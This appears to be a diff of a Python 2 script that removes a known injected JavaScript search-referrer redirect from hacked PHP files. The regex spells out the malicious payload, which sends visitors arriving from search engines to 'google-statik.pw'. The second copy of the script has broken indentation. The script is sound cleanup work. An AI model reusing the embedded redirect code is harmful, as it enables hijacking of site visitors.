jasimmk · November 8, 2016 23:15
diff --git a/remove_php_hijacked_cmdline.py b/remove_php_hijacked_cmdline.py
 #!/bin/env python
 ##
 ## Script to remove injected scripts from php files
 ##

 ## Refer regex escaping http://stackoverflow.com/questions/3446170/escape-string-for-use-in-javascript-regex

 import glob
 import re
 from optparse import OptionParser

 FILE_PATTERN = '*.php'
 TEXT_PATTERN = "<script type=\"text/javascript\">\s*?function R\(\)\{var Ref=document\.referrer;if\(Ref\.indexOf\('\.google\.'\)!=-1\|\|Ref\.indexOf\('\.bing\.'\)!=-1\|\|Ref\.indexOf\('\.yahoo\.'\)!=-1\|\|Ref\.indexOf\('\.aol\.'\)!=-1\|\|Ref\.indexOf\('\.ask\.'\)!=-1\|\|Ref\.indexOf\('\.altavista\.'\)!=-1\|\|Ref\.indexOf\('\.yandex\.'\)!=-1\)\{document\.write\('<script language=\"javascript\">docu'\+'ment\.location=\"http://google-statik\.pw/XcTyTp\"</s'\+'cript>'\)\}else\{document\.write\('\.'\)\}\}R\(\);\s*?</script>"
 re_pattern = re.compile(TEXT_PATTERN)
 NEW_TEXT = ''


 def escape_regex(text_data):
    """
    Escapes text for regular expression
    :param text_data: text string that needs to be 'regex' safe
    :returns: regex compatible text
    """
    # double backslash because it is used as escape character
    for chr in ['\\','^','$','*','+','?','.','(',')','|','{','}','[',']', '"']:
        text_data = text_data.replace(chr, '\%s' % chr)
    return text_data

 def main(options):
    if options.filename:
        f = options.filename
        print "Checking %s" % f
        with open(f, 'r') as fr:
           fdata = fr.read()
           results = re.search(re_pattern, fdata)
           if results:
               print ">> Replacing"
               with open(f, 'w') as fw:
                   fdata = re.sub(re_pattern, NEW_TEXT, fdata)
                   fw.write(fdata)


 if __name__ == '__main__':
    usage = "usage: %prog -f filename"
    parser = OptionParser(usage)
    parser.add_option("-f", "--file", dest="filename",
                      help="Check the file for code and replace if thereis", metavar="FILE")

    options, args = parser.parse_args()

    if not (options and options.filename):
        parser.error("You need to pass the file name as argument")
    main(options)
	#!/bin/env python
	##
	## Script to remove injected scripts from php files
	##

	## Refer regex escaping http://stackoverflow.com/questions/3446170/escape-string-for-use-in-javascript-regex

	import glob
	import re
	from optparse import OptionParser

	FILE_PATTERN = '*.php'
	TEXT_PATTERN = "<script type=\"text/javascript\">\s?function R\(\)\{var Ref=document\.referrer;if\(Ref\.indexOf\('\.google\.'\)!=-1\\|\\|Ref\.indexOf\('\.bing\.'\)!=-1\\|\\|Ref\.indexOf\('\.yahoo\.'\)!=-1\\|\\|Ref\.indexOf\('\.aol\.'\)!=-1\\|\\|Ref\.indexOf\('\.ask\.'\)!=-1\\|\\|Ref\.indexOf\('\.altavista\.'\)!=-1\\|\\|Ref\.indexOf\('\.yandex\.'\)!=-1\)\{document\.write\('<script language=\"javascript\">docu'\+'ment\.location=\"http://google-statik\.pw/XcTyTp\"</s'\+'cript>'\)\}else\{document\.write\('\.'\)\}\}R\(\);\s?</script>"
	re_pattern = re.compile(TEXT_PATTERN)
	NEW_TEXT = ''


	def escape_regex(text_data):
	"""
	Escapes text for regular expression
	:param text_data: text string that needs to be 'regex' safe
	:returns: regex compatible text
	"""
	# double backslash because it is used as escape character
	for chr in ['\\','^','$','*','+','?','.','(',')','\|','{','}','[',']', '"']:
	text_data = text_data.replace(chr, '\%s' % chr)
	return text_data

	def main(options):
	if options.filename:
	f = options.filename
	print "Checking %s" % f
	with open(f, 'r') as fr:
	fdata = fr.read()
	results = re.search(re_pattern, fdata)
	if results:
	print ">> Replacing"
	with open(f, 'w') as fw:
	fdata = re.sub(re_pattern, NEW_TEXT, fdata)
	fw.write(fdata)


	if __name__ == '__main__':
	usage = "usage: %prog -f filename"
	parser = OptionParser(usage)
	parser.add_option("-f", "--file", dest="filename",
	help="Check the file for code and replace if thereis", metavar="FILE")

	options, args = parser.parse_args()

	if not (options and options.filename):
	parser.error("You need to pass the file name as argument")
	main(options)